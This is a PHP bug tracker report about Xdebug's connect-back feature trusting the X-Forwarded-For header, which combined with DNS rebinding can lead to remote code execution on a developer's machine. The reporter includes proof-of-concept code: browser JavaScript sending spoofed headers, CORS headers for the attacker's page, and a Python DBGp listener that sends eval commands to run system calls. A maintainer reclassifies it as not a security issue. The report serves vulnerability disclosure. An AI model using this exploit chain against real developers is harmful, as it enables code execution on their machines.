|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #76149 [RCE]xdebug which configured to use remote debugging may leads to RCE
Submitted: 2018-03-26 07:30 UTC Modified: 2018-03-30 06:08 UTC
From: md5_salt at qq dot com Assigned: derick (profile)
Status: Assigned Package: Xdebug (PECL)
PHP Version: 7.2.4RC1 OS: all
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2018-03-26 07:30 UTC] md5_salt at qq dot com
A php programmer who use xdebug's remote debugging feature may affects RCE when he just access to attacker's website in modern browsers. The detail as follows.

As in the doc( of xdebug, if `xdebug.remote_connect_back` is enabled, the `xdebug.remote_host setting` is ignored and Xdebug will try to connect to the client that made the HTTP request. It checks the `$_SERVER['HTTP_X_FORWARDED_FOR']` and `$_SERVER['REMOTE_ADDR']` variables to find out which IP address to use.

If xdebug is configured as follows, we can use `$_SERVER['HTTP_X_FORWARDED_FOR']` as the connect back ip.
xdebug.remote_connect_back = 1
xdebug.remote_enable = 1
xdebug.remote_log =  /tmp/test.log

For php programmers, they always setup a local environment and enable xdebug to debug php programs. If we can send a http request with `X-Forwarded-For` header(which points to attacker's server) to local url just like `` or `` then attacker can get a xdebug's connect back and then use DBGp commands to execute any php code.

As we all know, to send special request headers using ajax in browsers, ajax first send an `OPTIONS` request to the target url and we need `Access-Control-Allow-Headers: X-Forwarded-For` in the response headers, but there always no such a header in the local program.

There is a tech called dns rebinding. Attacker can setup a private dns server and make a domain first resolved to attacker's ip and then . The victim first access attacker's domain in the browser, pull payloads from attacker's server and then DNS changed to and the browser launch the exploit to . As the domain do not change, the browser's security features are still obeyed, but the exploit is send to

The urls referenced

Test script:
The payload used in attacker's website.
<script type="text/javascript">
function exp(url, remote){
	var invocation = new XMLHttpRequest();'GET', url, true);
	invocation.setRequestHeader('X-Forwarded-For', remote);
	invocation.onreadystatechange = function(){};
url = 'http://attacker-domain-with-dns-rebind/index.php?XDEBUG_SESSION_START';
remote = '' // attacker's server ip  
exp(url, remote)
setInterval(function(){exp(url, remote)}, 1000)

The payload for attacker's index.php.
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: X-Forwarded-For');

The payload for xdebug's connect back.
import socket

ip_port = ('',9000)
sk = socket.socket()
conn, addr = sk.accept()

while True:
    client_data = conn.recv(1024)

    data = """system('whoami');"""
    conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2018-03-26 08:08 UTC] md5_salt at qq dot com
I think the way to solve this is not to get connect back ip from X-Forwarded-For header.
 [2018-03-26 17:37 UTC]
-Assigned To: +Assigned To: derick
 [2018-03-30 05:54 UTC] md5_salt at qq dot com
the idea is just like

you can check that for reference
 [2018-03-30 06:08 UTC]
-Type: Security +Type: Bug
 [2018-03-30 06:08 UTC]
Please read

Not a security issue
* requires the use of debugging facilities - ex. xdebug, var_dump
PHP Copyright © 2001-2018 The PHP Group
All rights reserved.
Last updated: Sun Nov 19 01:31:42 2017 UTC